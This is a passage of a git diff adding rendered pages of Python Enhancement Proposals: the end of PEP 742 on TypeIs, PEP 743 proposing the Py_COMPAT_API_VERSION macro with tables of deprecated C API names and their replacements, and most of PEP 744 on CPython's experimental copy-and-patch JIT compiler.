PEP 724 previously proposed changing the specified behavior of typing.TypeGuard so +that if the return type of the guard is consistent with the input type, the behavior proposed +here for TypeIs would apply. This proposal has some important advantages: because it +does not require any runtime changes, it requires changes only in type checkers, making it easier +for users to take advantage of the new, usually more intuitive behavior.

+

However, this approach has some major problems. Users who have written TypeGuard functions +expecting the existing semantics specified in PEP 647 would see subtle and potentially breaking +changes in how type checkers interpret their code. The split behavior of TypeGuard, where it +works one way if the return type is consistent with the input type and another way if it is not, +could be confusing for users. The Typing Council was unable to come to an agreement in favor of +PEP 724; as a result, we are proposing this alternative PEP.

+
+
+

Do nothing

+

Both this PEP and the alternative proposed in PEP 724 have shortcomings. The latter are +discussed above. As for this PEP, it introduces two special forms with very similar semantics, +and it potentially creates a long migration path for users currently using TypeGuard +who would be better off with different narrowing semantics.

+

One way forward, then, is to do nothing and live with the current limitations of the type system. +However, we believe that the limitations of the current TypeGuard, as outlined in the “Motivation” +section, are significant enough that it is worthwhile to change the type system to address them. +If we do not make any change, users will continue to encounter the same unintuitive behaviors from +TypeGuard, and the type system will be unable to properly represent common type narrowing functions +like inspect.isawaitable.

+
+
+

Alternative names

+

This PEP currently proposes the name TypeIs, emphasizing that the special form TypeIs[T] +returns whether the argument is of type T, and mirroring +TypeScript’s syntax. +Other names were considered, including in an earlier version of this PEP.

+

Options include:

+
    +
  • IsInstance (post by Paul Moore): +emphasizes that the new construct behaves similarly to the builtin isinstance().
  • +
  • Narrowed or NarrowedTo: shorter than TypeNarrower but keeps the connection to “type narrowing” +(suggested by Eric Traut).
  • +
  • Predicate or TypePredicate: mirrors TypeScript’s name for the feature, “type predicates”.
  • +
  • StrictTypeGuard (earlier drafts of PEP 724): emphasizes that the new construct performs a stricter +version of type narrowing than typing.TypeGuard.
  • +
  • TypeCheck (post by Nicolas Tessore): +emphasizes the binary nature of the check.
  • +
  • TypeNarrower: emphasizes that the function narrows its argument type. Used in an earlier version of this PEP.
  • +
+
+
+
+

Acknowledgments

+

Much of the motivation and specification for this PEP derives from PEP 724. While +this PEP proposes a different solution for the problem at hand, the authors of PEP 724, Eric Traut, Rich +Chiodo, and Erik De Bonte, made a strong case for their proposal and this proposal +would not have been possible without their work.

+
+ +
+
+

Source: https://github.com/python/peps/blob/main/peps/pep-0742.rst

+

Last modified: 2024-10-17 12:49:39 GMT

+ +
+ +
+ + + + + \ No newline at end of file diff --git a/pep-0743/index.html b/pep-0743/index.html new file mode 100644 index 00000000000..b22b6725b35 --- /dev/null +++ b/pep-0743/index.html @@ -0,0 +1,707 @@ + + + + + + + + PEP 743 – Add Py_COMPAT_API_VERSION to the Python C API | peps.python.org + + + + + + + + + + + + + + + + + + + + + + + + Following system colour scheme + + + + + + + Selected dark colour scheme + + + + + + + Selected light colour scheme + + + + + + + + + + + + + + +
+
+

Python Enhancement Proposals

+ + +
+
+
+

PEP 743 – Add Py_COMPAT_API_VERSION to the Python C API

+
+
Author:
+
Victor Stinner <vstinner at python.org>, +Petr Viktorin <encukou at gmail.com>
+
PEP-Delegate:
+
C API Working Group
+
Discussions-To:
+
Discourse thread
+
Status:
+
Draft
+
Type:
+
Standards Track
+
Created:
+
11-Mar-2024
+
Python-Version:
+
3.14
+
+
+
+
Table of Contents +
+
+

Abstract

+

Add Py_COMPAT_API_VERSION C macro that hides some deprecated and +soft-deprecated symbols, allowing users to opt out of using API with known +issues that other API solves. +The macro is versioned, allowing users to update (or not) on their own pace.

+

Also, add namespaced alternatives for API without the Py_ prefix, +and soft-deprecate the original names.

+
+
+

Motivation

+

Some of Python’s C API has flaws that are only obvious in hindsight.

+

If an API prevents adding features or optimizations, or presents a serious +security risk or maintenance burden, we can deprecate and remove it as +described in PEP 387.

+

However, this leaves us with some API that has “sharp edges” – it works fine +for its current users, but should be avoided in new code. +For example:

+
    +
  • API that cannot signal an exception, so failures are either ignored or +exit the process with a fatal error. For example PyObject_HasAttr.
  • +
  • API that is not thread-safe, for example by borrowing references from +mutable objects, or exposing unfinished mutable objects. For example +PyDict_GetItemWithError.
  • +
  • API with names that don’t use the Py/_Py prefix, and so can clash +with other code. For example: setter.
  • +
+

It is important to note that despite such flaws, it’s usually possible +to use the API correctly. For example, in a single-threaded environment, +thread safety is not an issue. +We do not want to break working code, even if it uses API that would be wrong +in some – or even most – other contexts.

+

On the other hand, we want to steer users away from such “undesirable” API +in new code, especially if a safer alternative exists.

+
+

Adding the Py prefix

+

Some names defined in CPython headers is not namespaced: it that lacks the +Py prefix (or a variant: _Py, and alternative capitalizations). +For example, we declare a function type named simply setter.

+

While such names are not exported in the ABI (as checked by make smelly), +they can clash with user code and, more importantly, with libraries linked +to third-party extensions.

+

While it would be possible to provide namespaced aliases and (soft-)deprecate +these names, the only way to make them not clash with third-party code is to +not define them in Python headers at all.

+
+
+
+

Rationale

+

We want to allow an easy way for users to avoid “undesirable” API if they +choose to do so.

+

It might be be sufficient to leave this to third-party linters. +For that we’d need a good way to expose a list of (soft-)deprecated +API to such linters. +While adding that, we can – rather easily – do the linter’s job directly +in CPython headers, avoiding the neel for an extra tool. +Unlike Python, C makes it rather easy to limit available API – for a whole +project or for each individual source file – by having users define +an “opt-in” macro.

+

We already do something similar with Py_LIMITED_API, which limits the +available API to a subset that compiles to stable ABI. (In hindsight, we should +have used a different macro name for that particular kind of limiting, but it’s +too late to change that now.)

+

To prevent working code from breaking as we identify more “undesirable” API +and add safer alternatives to it, the opt-in macro should be versioned. +Users can choose a version they need based on their compatibility requirements, +and update it at their own pace.

+

To be clear, this mechanism is not a replacement for deprecation. +Deprecation is for API that prevents new features or optimizations, or +presents a security risk or maintenance burden. +This mechanism, on the other hand, is meant for cases where “we found +a slightly better way of doing things” – perhaps one that’s harder to misuse, +or just has a less misleading name. +(On a lighter note: many people configure a code quality checker to shout at +them about the number of blank lines between functions. Let’s help them +identify more substantial “code smells”!)

+

The proposed macro does not change any API definitions; it only hides them. +So, if code compiles with the macro, it’ll also compile without it, with +identical behaviour. +This has implications for core devs: to deal with undesirable behaviour, +we’ll need to introduce new, better API, and then discourage the old one. +In turn, this implies that we should look at an individual API and fix all its +known issues at once, rather than do codebase-wide sweeps for a single kind of +issue, so that we avoid multiple renames of the same function.

+
+

Adding the Py prefix

+

An opt-in macro allows us to omit definitions that could clash with +third-party libraries.

+
+
+
+

Specification

+

We introduce a Py_COMPAT_API_VERSION macro. +If this macro is defined before #include <Python.h>, some API definitions +– as described below – will be omitted from the Python header files.

+

The macro only omits complete top-level definitions exposed from <Python.h>. +Other things (the ABI, structure definitions, macro expansions, static inline +function bodies, etc.) are not affected.

+

The C API working group (PEP 731) has authority over the set of omitted +definitions.

+

The set of omitted definitions will be tied to a particular feature release +of CPython, and is finalized in each 3.x.0 Beta 1 release. +In rare cases, entries can be removed (i.e. made available for use) at any +time.

+

The macro should be defined to a version in the format used by +PY_VERSION_HEX, with the “micro”, “release” and “serial” fields +set to zero. +For example, to omit API deemed undesirable in 3.14.0b1, users should define +Py_COMPAT_API_VERSION to 0x030e0000.

+
+

Requirements for omitted API

+

An API that is omitted with Py_COMPAT_API_VERSION must:

+
    +
  • be soft-deprecated (see PEP 387);
  • +
  • for all known use cases of the API, have a documented alternative +or workaround;
  • +
  • have tests to ensure it keeps working (except for 1:1 renames using +#define or typedef);
  • +
  • be documented (except if it was never mentioned in previous versions of the +documentation); and
  • +
  • be approved by the C API working group. (The WG may give blanket approvals +for groups of related API; see Initial set below for examples.)
  • +
+

Note that Py_COMPAT_API_VERSION is meant for API that can be trivially +replaced by a better alternative. +API without a replacement should generally be deprecated instead.

+
+
+

Location

+

All API definitions omitted by Py_COMPAT_API_VERSION will be moved to +a new header, Include/legacy.h.

+

This is meant to help linter authors compile lists, so they can flag the API +with warnings rather than errors.

+

Note that for simple renaming of source-only constructs (macros, types), we +expect names to be omitted in the same version – or the same PR – that adds +a replacement. +This means that the original definition will be renamed, and a typedef +or #define for the old name added to Include/legacy.h.

+
+
+

Documentation

+

Documentation for omitted API should generally:

+
    +
  • appear after the recommended replacement,
  • +
  • reference the replacement (e.g. “Similar to X, but…”), and
  • +
  • focus on differences from the replacement and migration advice.
  • +
+

Exceptions are possible if there is a good reason for them.

+
+
+

Initial set

+

The following API will be omitted with Py_COMPAT_API_VERSION set to +0x030e0000 (3.14) or greater:

+
    +
  • Omit API returning borrowed references: + + + + + + + + + + + + + + + + + + + +
    Omitted APIReplacement
    PyDict_GetItem()PyDict_GetItemRef()
    PyDict_GetItemString()PyDict_GetItemStringRef()
    PyImport_AddModule()PyImport_AddModuleRef()
    PyList_GetItem()PyList_GetItemRef()
    +
  • +
  • Omit deprecated APIs: + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + +
    Omitted Deprecated APIReplacement
    PY_FORMAT_SIZE_T"z"
    PY_UNICODE_TYPEwchar_t
    PyCode_GetFirstFree()PyUnstable_Code_GetFirstFree()
    PyCode_New()PyUnstable_Code_New()
    PyCode_NewWithPosOnlyArgs()PyUnstable_Code_NewWithPosOnlyArgs()
    PyImport_ImportModuleNoBlock()PyImport_ImportModule()
    PyMem_DEL()PyMem_Free()
    PyMem_Del()PyMem_Free()
    PyMem_FREE()PyMem_Free()
    PyMem_MALLOC()PyMem_Malloc()
    PyMem_NEW()PyMem_New()
    PyMem_REALLOC()PyMem_Realloc()
    PyMem_RESIZE()PyMem_Resize()
    PyModule_GetFilename()PyModule_GetFilenameObject()
    PyOS_AfterFork()PyOS_AfterFork_Child()
    PyObject_DEL()PyObject_Free()
    PyObject_Del()PyObject_Free()
    PyObject_FREE()PyObject_Free()
    PyObject_MALLOC()PyObject_Malloc()
    PyObject_REALLOC()PyObject_Realloc()
    PySlice_GetIndicesEx()(two calls; see current docs)
    PyThread_ReInitTLS()(no longer needed)
    PyThread_create_key()PyThread_tss_alloc()
    PyThread_delete_key()PyThread_tss_free()
    PyThread_delete_key_value()PyThread_tss_delete()
    PyThread_get_key_value()PyThread_tss_get()
    PyThread_set_key_value()PyThread_tss_set()
    PyUnicode_AsDecodedObject()PyUnicode_Decode()
    PyUnicode_AsDecodedUnicode()PyUnicode_Decode()
    PyUnicode_AsEncodedObject()PyUnicode_AsEncodedString()
    PyUnicode_AsEncodedUnicode()PyUnicode_AsEncodedString()
    PyUnicode_IS_READY()(no longer needed)
    PyUnicode_READY()(no longer needed)
    PyWeakref_GET_OBJECT()PyWeakref_GetRef()
    PyWeakref_GetObject()PyWeakref_GetRef()
    Py_UNICODEwchar_t
    _PyCode_GetExtra()PyUnstable_Code_GetExtra()
    _PyCode_SetExtra()PyUnstable_Code_SetExtra()
    _PyDict_GetItemStringWithError()PyDict_GetItemStringRef()
    _PyEval_RequestCodeExtraIndex()PyUnstable_Eval_RequestCodeExtraIndex()
    _PyHASH_BITSPyHASH_BITS
    _PyHASH_IMAGPyHASH_IMAG
    _PyHASH_INFPyHASH_INF
    _PyHASH_MODULUSPyHASH_MODULUS
    _PyHASH_MULTIPLIERPyHASH_MULTIPLIER
    _PyObject_EXTRA_INIT(no longer needed)
    _PyThreadState_UncheckedGet()PyThreadState_GetUnchecked()
    _PyUnicode_AsString()PyUnicode_AsUTF8()
    _Py_HashPointer()Py_HashPointer()
    _Py_T_OBJECTPy_T_OBJECT_EX
    _Py_WRITE_RESTRICTED(no longer needed)
    +
  • +
  • Soft-deprecate and omit APIs: + + + + + + + + + + + + + + + + + + + + + + + + + +
    Omitted Deprecated APIReplacement
    PyDict_GetItemWithError()PyDict_GetItemRef()
    PyDict_SetDefault()PyDict_SetDefaultRef()
    PyMapping_HasKey()PyMapping_HasKeyWithError()
    PyMapping_HasKeyString()PyMapping_HasKeyStringWithError()
    PyObject_HasAttr()PyObject_HasAttrWithError()
    PyObject_HasAttrString()PyObject_HasAttrStringWithError()
    +
  • +
  • Omit <structmember.h> legacy API:

    The header file structmember.h, which is not included from <Python.h> +and must be included separately, will #error if +Py_COMPAT_API_VERSION is defined. +This affects the following API:

    + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + +
    Omitted Deprecated APIReplacement
    T_SHORTPy_T_SHORT
    T_INTPy_T_INT
    T_LONGPy_T_LONG
    T_FLOATPy_T_FLOAT
    T_DOUBLEPy_T_DOUBLE
    T_STRINGPy_T_STRING
    T_OBJECT(tp_getset; docs to be written)
    T_CHARPy_T_CHAR
    T_BYTEPy_T_BYTE
    T_UBYTEPy_T_UBYTE
    T_USHORTPy_T_USHORT
    T_UINTPy_T_UINT
    T_ULONGPy_T_ULONG
    T_STRING_INPLACEPy_T_STRING_INPLACE
    T_BOOLPy_T_BOOL
    T_OBJECT_EXPy_T_OBJECT_EX
    T_LONGLONGPy_T_LONGLONG
    T_ULONGLONGPy_T_ULONGLONG
    T_PYSSIZETPy_T_PYSSIZET
    T_NONE(tp_getset; docs to be written)
    READONLYPy_READONLY
    PY_AUDIT_READPy_AUDIT_READ
    READ_RESTRICTEDPy_AUDIT_READ
    PY_WRITE_RESTRICTED(no longer needed)
    RESTRICTEDPy_AUDIT_READ
    +
  • +
  • Omit soft deprecated macros: + + + + + + + + + + + + + + + + + + + +
    Omitted MacrosReplacement
    Py_IS_NAN()isnan() (C99+ <math.h>)
    Py_IS_INFINITY()isinf(X) (C99+ <math.h>)
    Py_IS_FINITE()isfinite(X) (C99+ <math.h>)
    Py_MEMCPY()memcpy() (C <string.h>)
    +
  • +
  • Soft-deprecate and omit typedefs without the Py/_Py prefix +(getter, setter, allocfunc, …), in favour of new ones +that add the prefix (Py_getter , etc.)
  • +
  • Soft-deprecate and omit macros without the Py/_Py prefix +(METH_O, CO_COROUTINE, FUTURE_ANNOTATIONS, WAIT_LOCK, …), +favour of new ones that add the prefix (Py_METH_O , etc.).
  • +
  • Any others approved by the C API workgroup
  • +
+

If any of these proposed replacements, or associated documentation, +are not added in time for 3.14.0b1, they’ll be omitted with later versions +of Py_COMPAT_API_VERSION. +(We expect this for macros generated by configure: HAVE_*, WITH_*, +ALIGNOF_*, SIZEOF_*, and several without a common prefix.)

+
+
+
+

Implementation

+

TBD

+
+
+

Open issues

+

The name Py_COMPAT_API_VERSION was taken from the earlier PEP; +it doesn’t fit this version.

+
+
+

Backwards Compatibility

+

The macro is backwards compatible. +Developers can introduce and update the macro on their own pace, potentially +for one source file at a time.

+
+
+

Discussions

+ +
+
+

Prior Art

+
    +
  • Py_LIMITED_API macro of PEP 384 “Defining a Stable ABI”.
  • +
  • Rejected PEP 606 “Python Compatibility Version” which has a global +scope.
  • +
+
+ +
+
+

Source: https://github.com/python/peps/blob/main/peps/pep-0743.rst

+

Last modified: 2024-11-26 11:55:57 GMT

+ +
+ +
+ + + + + \ No newline at end of file diff --git a/pep-0744/index.html b/pep-0744/index.html new file mode 100644 index 00000000000..bdccb3284e4 --- /dev/null +++ b/pep-0744/index.html @@ -0,0 +1,663 @@ + + + + + + + + PEP 744 – JIT Compilation | peps.python.org + + + + + + + + + + + + + + + + + + + + + + + + Following system colour scheme + + + + + + + Selected dark colour scheme + + + + + + + Selected light colour scheme + + + + + + + + + + + + + + +
+
+

Python Enhancement Proposals

+ + +
+
+
+

PEP 744 – JIT Compilation

+
+
Author:
+
Brandt Bucher <brandt at python.org>, +Savannah Ostrowski <savannahostrowski at gmail.com>
+
Discussions-To:
+
Discourse thread
+
Status:
+
Draft
+
Type:
+
Informational
+
Created:
+
11-Apr-2024
+
Python-Version:
+
3.13
+
Post-History:
+
11-Apr-2024
+
+
+
+
Table of Contents +
+
+

Abstract

+

Earlier this year, an experimental “just-in-time” compiler was merged into CPython’s +main development branch. While recent CPython releases have included other +substantial internal changes, this addition represents a particularly +significant departure from the way CPython has traditionally executed Python +code. As such, it deserves wider discussion.

+

This PEP aims to summarize the design decisions behind this addition, the +current state of the implementation, and future plans for making the JIT a +permanent, non-experimental part of CPython. It does not seek to provide a +comprehensive overview of how the JIT works, instead focusing on the +particular advantages and disadvantages of the chosen approach, as well as +answering many questions that have been asked about the JIT since its +introduction.

+

Readers interested in learning more about the new JIT are encouraged to consult +the following resources:

+
    +
  • The presentation which first introduced the +JIT at the 2023 CPython Core Developer Sprint. It includes relevant +background, a light technical introduction to the “copy-and-patch” technique +used, and an open discussion of its design amongst the core developers +present. Slides for this talk can be found on GitHub.
  • +
  • The open access paper originally +describing copy-and-patch.
  • +
  • The blog post by the +paper’s author detailing the implementation of a copy-and-patch JIT compiler +for Lua. While this is a great low-level explanation of the approach, note +that it also incorporates other techniques and makes implementation decisions +that are not particularly relevant to CPython’s JIT.
  • +
  • The implementation itself.
  • +
+
+
+

Motivation

+

Until this point, CPython has always executed Python code by compiling it to +bytecode, which is interpreted at runtime. This bytecode is a more-or-less +direct translation of the source code: it is untyped, and largely unoptimized.

+

Since the Python 3.11 release, CPython has used a “specializing adaptive +interpreter” (PEP 659), which rewrites these bytecode instructions in-place with type-specialized versions as they run. +This new interpreter delivers significant performance improvements, despite the +fact that its optimization potential is limited by the boundaries of individual +bytecode instructions. It also collects a wealth of new profiling information: +the types flowing though a program, the memory layout of particular objects, and +what paths through the program are being executed the most. In other words, +what to optimize, and how to optimize it.

+

Since the Python 3.12 release, CPython has generated this interpreter from a +C-like domain-specific language (DSL). In +addition to taming some of the complexity of the new adaptive interpreter, the +DSL also allows CPython’s maintainers to avoid hand-writing tedious boilerplate +code in many parts of the interpreter, compiler, and standard library that must +be kept in sync with the instruction definitions. This ability to generate large +amounts of runtime infrastructure from a single source of truth is not only +convenient for maintenance; it also unlocks many possibilities for expanding +CPython’s execution in new ways. For instance, it makes it feasible to +automatically generate tables for translating a sequence of instructions into an +equivalent sequence of smaller “micro-ops”, generate an optimizer for sequences +of these micro-ops, and even generate an entire second interpreter for executing +them.

+

In fact, since early in the Python 3.13 release cycle, all CPython builds have +included this exact micro-op translation, optimization, and execution machinery. +However, it is disabled by default; the overhead of interpreting even optimized +traces of micro-ops is just too large for most code. Heavier optimization +probably won’t improve the situation much either, since any efficiency gains +made by new optimizations will likely be offset by the interpretive overhead of +even smaller, more complex micro-ops.

+

The most obvious strategy to overcome this new bottleneck is to statically +compile these optimized traces. This presents opportunities to avoid several +sources of indirection and overhead introduced by interpretation. In particular, +it allows the removal of dispatch overhead between micro-ops (by replacing a +generic interpreter with a straight-line sequence of hot code), instruction +decoding overhead for individual micro-ops (by “burning” the values or addresses +of arguments, constants, and cached values directly into machine instructions), +and memory traffic (by moving data off of heap-allocated Python frames and into +physical hardware registers).

+

Since much of this data varies even between identical runs of a program and the +existing optimization pipeline makes heavy use of runtime profiling information, +it doesn’t make much sense to compile these traces ahead of time and would be a +substantial redesign of the existing specification and micro-op tracing infrastructure +that has already been implemented. As has been demonstrated for many other dynamic +languages (and even Python itself), the most promising +approach is to compile the optimized micro-ops “just in time” for execution.

+
+
+

Rationale

+

Despite their reputation, JIT compilers are not magic “go faster” machines. +Developing and maintaining any sort of optimizing compiler for even a single +platform, let alone all of CPython’s most popular supported platforms, is an +incredibly complicated, expensive task. Using an existing compiler framework +like LLVM can make this task simpler, but only at the cost of introducing heavy +runtime dependencies and significantly higher JIT compilation overhead.

+

It’s clear that successfully compiling Python code at runtime requires not only +high-quality Python-specific optimizations for the code being run, but also +quick generation of efficient machine code for the optimized program. The Python +core development team has the necessary skills and experience for the former (a +middle-end tightly coupled to the interpreter), and copy-and-patch compilation +provides an attractive solution for the latter.

+

In a nutshell, copy-and-patch allows a high-quality template JIT compiler to be +generated from the same DSL used to generate the rest of the interpreter. For a +widely-used, volunteer-driven project like CPython, this benefit cannot be +overstated: CPython’s maintainers, by merely editing the bytecode definitions, +will also get the JIT backend updated “for free”, for all JIT-supported +platforms, at once. This is equally true whether instructions are being added, +modified, or removed.

+

Like the rest of the interpreter, the JIT compiler is generated at build time, +and has no runtime dependencies. It supports a wide range of platforms (see the +Support section below), and has comparatively low maintenance burden. In all, +the current implementation is made up of about 900 lines of build-time Python +code and 500 lines of runtime C code.

+
+
+

Specification

+

The JIT is currently not part of the default build configuration, and it is +likely to remain that way for the foreseeable future (though official binaries +may include it). That said, the JIT will become non-experimental once all of +the following conditions are met:

+
    +
  1. It provides a meaningful performance improvement for at least one popular +platform (realistically, on the order of 5%).
  2. +
  3. It can be built, distributed, and deployed with minimal disruption.
  4. +
  5. The Steering Council, upon request, has determined that it would provide more +value to the community if enabled than if disabled (considering tradeoffs +such as maintenance burden, memory usage, or the feasibility of alternate +designs).
  6. +
+

These criteria should be considered a starting point, and may be expanded over +time. For example, discussion of this PEP may reveal that additional +requirements (such as multiple committed maintainers, a security audit, +documentation in the devguide, support for out-of-process debugging, or a +runtime option to disable the JIT) should be added to this list.

+

Until the JIT is non-experimental, it should not be used in production, and +may be broken or removed at any time without warning.

+

Once the JIT is no longer experimental, it should be treated in much the same +way as other build options such as --enable-optimizations or --with-lto. +It may be a recommended (or even default) option for some platforms, and release +managers may choose to enable it in official releases.

+
+

Support

+

The JIT has been developed for all of PEP 11’s current tier one platforms, +most of its tier two platforms, and one of its tier three platforms. +Specifically, CPython’s main branch has CI +building and testing the JIT for both release and debug builds on:

+
    +
  • aarch64-apple-darwin/clang
  • +
  • aarch64-pc-windows/msvc [1]
  • +
  • aarch64-unknown-linux-gnu/clang [2]
  • +
  • aarch64-unknown-linux-gnu/gcc [2]
  • +
  • i686-pc-windows-msvc/msvc
  • +
  • x86_64-apple-darwin/clang
  • +
  • x86_64-pc-windows-msvc/msvc
  • +
  • x86_64-unknown-linux-gnu/clang
  • +
  • x86_64-unknown-linux-gnu/gcc
  • +
+

It’s worth noting that some platforms, even future tier one platforms, may never +gain JIT support. This can be for a variety of reasons, including insufficient +LLVM support (powerpc64le-unknown-linux-gnu/gcc), inherent limitations of +the platform (wasm32-unknown-wasi/clang), or lack of developer interest +(x86_64-unknown-freebsd/clang).

+

Once JIT support for a platform is added (meaning, the JIT builds successfully +without displaying warnings to the user), it should be treated in much the same +way as PEP 11 prescribes: it should have reliable CI/buildbots, and JIT +failures on tier one and tier two platforms should block releases. Though it’s +not necessary to update PEP 11 to specify JIT support, it may be helpful to +do so anyway. Otherwise, a list of supported platforms should be maintained in +the JIT’s README.

+

Since it should always be possible to build CPython without the JIT, removing +JIT support for a platform should not be considered a backwards-incompatible +change. However, if it is reasonable to do so, the normal deprecation process +should be followed as outlined in PEP 387.

+

The JIT’s build-time dependencies may be changed between releases, within +reason.

+
+
+
+

Backwards Compatibility

+

Due to the fact that the current interpreter and the JIT backend are both +generated from the same specification, the behavior of Python code should be +completely unchanged. In practice, observable differences that have been found +and fixed during testing have tended to be bugs in the existing micro-op +translation and optimization stages, rather than bugs in the copy-and-patch +step.

+
+

Debugging

+

Tools that profile and debug Python code will continue to work fine. This +includes in-process tools that use Python-provided functionality (like +sys.monitoring, sys.settrace, or sys.setprofile), as well as +out-of-process tools that walk Python frames from the interpreter state.

+

However, it appears that profilers and debuggers for C code are currently +unable to trace back through JIT frames. Working with leaf frames is possible +(this is how the JIT itself is debugged), though it is of limited utility due to +the absence of proper debugging information for JIT frames.

+

Since the code templates emitted by the JIT are compiled by Clang, it may be +possible to allow JIT frames to be traced through by simply modifying the +compiler flags to use frame pointers more carefully. It may also be possible to +harvest and emit the debugging information produced by Clang. Neither of these +ideas have been explored very deeply.

+

While this is an issue that should be fixed, fixing it is not a particularly +high priority at this time. This is probably a problem best explored by somebody +with more domain expertise in collaboration with those maintaining the JIT, who +have little experience with the inner workings of these tools.

+
+
+
+

Security Implications

+

This JIT, like any JIT, produces large amounts of executable data at runtime. +This introduces a potential new attack surface to CPython, since a malicious +actor capable of influencing the contents of this data is therefore capable of +executing arbitrary code. This is a well-known vulnerability of JIT +compilers.

+

In order to mitigate this risk, the JIT has been written with best practices in +mind. In particular, the data in question is not exposed by the JIT compiler to +other parts of the program while it remains writable, and at no point is the +data both writable and executable.

+

The nature of template-based JITs also seriously limits the kinds of code that +can be generated, further reducing the likelihood of a successful exploit. As an +additional precaution, the templates themselves are stored in static, read-only +memory.

+

However, it would be naive to assume that no possible vulnerabilities exist in +the JIT, especially at this early stage. The author is not a security expert, +but is available to join or work closely with the Python Security Response Team +to triage and fix security issues as they arise.

+
+

Apple Silicon

+

Though difficult to test without actually signing and packaging a macOS release, +it appears that macOS releases should enable the JIT Entitlement for the +Hardened Runtime.

+

This shouldn’t make installing Python any harder, but may add additional steps +for release managers to perform.

+
+
+
+

How to Teach This

+

Choose the sections that best describe you:

+
    +
  • If you are a Python programmer or end user…
      +
    • …nothing changes for you. Nobody should be distributing JIT-enabled +CPython interpreters to you while it is still an experimental feature. Once +it is non-experimental, you will probably notice slightly better performance +and slightly higher memory usage. You shouldn’t be able to observe any other +changes.
    • +
    +
  • +
  • If you maintain third-party packages…
      +
    • …nothing changes for you. There are no API or ABI changes, and the JIT is +not exposed to third-party code. You shouldn’t need to change your CI +matrix, and you shouldn’t be able to observe differences in the way your +packages work when the JIT is enabled.
    • +
    +
  • +
  • If you profile or debug Python code…
      +
    • …nothing changes for you. All Python profiling and tracing functionality +remains.
    • +
    +
  • +
  • If you profile or debug C code…
      +
    • …currently, the ability to trace through JIT frames is limited. This may +cause issues if you need to observe the entire C call stack, rather than +just “leaf” frames. See the Debugging section above for more information.
    • +
    +
  • +
  • If you compile your own Python interpreter….
      +
    • …if you don’t wish to build the JIT, you can simply ignore it. Otherwise, +you will need to install a compatible version of LLVM, and +pass the appropriate flag to the build scripts. Your build may take up to a +minute longer. Note that the JIT should not be distributed to end users or +used in production while it is still in the experimental phase.
    • +
    +
  • +
  • If you’re a maintainer of CPython (or a fork of CPython)…
      +
    • …and you change the bytecode definitions or the main interpreter +loop…
        +
      • …in general, the JIT shouldn’t be much of an inconvenience to you +(depending on what you’re trying to do). The micro-op interpreter isn’t +going anywhere, and still offers a debugging experience similar to what +the main bytecode interpreter provides today. There is moderate likelihood +that larger changes to the interpreter (such as adding new local +variables, changing error handling and deoptimization logic, or changing +the micro-op format) will require changes to the C template used to +generate the JIT, which is meant to mimic the main interpreter loop. You +may also occasionally just get unlucky and break JIT code generation, +which will require you to either modify the Python build scripts yourself, +or solicit the help of somebody more familiar with them (see below).
      • +
      +
    • +
    • …and you work on the JIT itself…
        +
      • …you hopefully already have a decent idea of what you’re getting +yourself into. You will be regularly modifying the Python build scripts, +the C template used to generate the JIT, and the C code that actually +makes up the runtime portion of the JIT. You will also be dealing with +all sorts of crashes, stepping over machine code in a debugger, staring at +COFF/ELF/Mach-O dumps, developing on a wide range of platforms, and +generally being the point of contact for the people changing the bytecode +when CI starts failing on their PRs (see above). Ideally, you’re at least +familiar with assembly, have taken a couple of courses with “compilers” +in their name, and have read a blog post or two about linkers.
      • +
      +
    • +
    • …and you maintain other parts of CPython…
        +
      • …nothing changes for you. You shouldn’t need to develop locally with JIT +builds. If you choose to do so (for example, to help reproduce and triage +JIT issues), your builds may take up to a minute longer each time the +relevant files are modified.
      • +
      +
    • +
    +
  • +
+
+
+

Reference Implementation

+

Key parts of the implementation include:

+ +
+
+

Rejected Ideas

+
+

Maintain it outside of CPython

+

While it is probably possible to maintain the JIT outside of CPython, its +implementation is tied tightly enough to the rest of the interpreter that +keeping it up-to-date would probably be more difficult than actually developing +the JIT itself. Additionally, contributors working on the existing micro-op +definitions and optimizations would need to modify and build two separate +projects to measure the effects of their changes under the JIT (whereas today, +infrastructure exists to do this automatically for any proposed change).

+

Releases of the separate “JIT” project would probably also need to correspond to +specific CPython pre-releases and patch releases, depending on exactly what +changes are present. Individual CPython commits between releases likely wouldn’t +have corresponding JIT releases at all, further complicating debugging efforts +(such as bisection to find breaking changes upstream).

+

Since the JIT is already quite stable, and the ultimate goal is for it to be a +non-experimental part of CPython, keeping it in main seems to be the best +path forward. With that said, the relevant code is organized in such a way that +the JIT can be easily “deleted” if it does not end up meeting its goals.

+
+
+

Turn it on by default

+

On the other hand, some have suggested that the JIT should be enabled by default +in its current form.

+

Again, it is important to remember that a JIT is not a magic “go faster” +machine; currently, the JIT is about as fast as the existing specializing +interpreter. This may sound underwhelming, but it is actually a fairly +significant achievement, and it’s the main reason why this approach was +considered viable enough to be merged into main for further development.

+

While the JIT provides significant gains over the existing micro-op interpreter, +it isn’t yet a clear win when always enabled (especially considering its +increased memory consumption and additional build-time dependencies). That’s the +purpose of this PEP: to clarify expectations about the objective criteria that +should be met in order to “flip the switch”.

+

At least for now, having this in main, but off by default, seems to be a +good compromise between always turning it on and not having it available at all.

+
+
+

Support multiple compiler toolchains

+

Clang is specifically needed because it’s the only C compiler with support for +guaranteed tail calls (musttail), which are required by CPython’s +continuation-passing-style approach +to JIT compilation. Without it, the tail-recursive calls between templates could +result in unbounded C stack growth (and eventual overflow).

+

Since LLVM also includes other functionalities required by the JIT build process +(namely, utilities for object file parsing and disassembly), and additional +toolchains introduce additional testing and maintenance burden, it’s convenient +to only support one major version of one toolchain at this time.

+
+
+

Compile the base interpreter’s bytecode

+

Most of the prior art for copy-and-patch uses it as a fast baseline JIT, whereas +CPython’s JIT is using the technique to compile optimized micro-op traces.

+

In practice, the new JIT currently sits somewhere between the “baseline” and +“optimizing” compiler tiers of other dynamic language runtimes. This is because +CPython uses its specializing adaptive interpreter to collect runtime profiling +information, which is used to detect and optimize “hot” paths through the code. +This step is carried out using self-modifying code, a technique which is much +more difficult to implement with a JIT compiler.

+

While it’s possible to compile normal bytecode using copy-and-patch (in fact, +early prototypes predated the micro-op interpreter and did exactly this), it +just doesn’t seem to provide enough optimization potential as the more granular +micro-op format.

+
+
+

